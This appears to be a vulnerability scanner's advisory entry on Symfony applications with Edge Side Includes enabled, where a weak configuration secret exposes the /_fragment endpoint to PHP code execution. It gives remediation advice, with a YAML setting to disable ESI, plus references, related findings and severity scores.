Description

Edge Side Includes or ESI is a small markup language for edge level dynamic web content assembly. The ESI specification describes tags you can embed in your pages to communicate with the gateway cache.

Your Symfony web application is configured to run with ESI (Edge-Side Includes) enabled. When ESI is enabled, the endpoint /_fragment can be used to run arbitrary PHP code if the Symfony configuration value secret is weak/predictable.

Remediation

Make sure your Symfony web application is using a strong value for Symfony's configuration value secret and consider disabling ESI (if not required) via 

# config/packages/framework.yaml
framework:
    # ...
    esi: false

References

Working with Edge Side Includes

Secret Fragments

Related Vulnerabilities

WordPress allows editing theme/plugin files

JBoss JMX management console

Apache Tomcat version older than 7.0.23

JBoss Web Console JMX Invoker

Symfony running in dev mode

Severity

Low

Classification

CWE-16 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N

Tags

Configuration Code Execution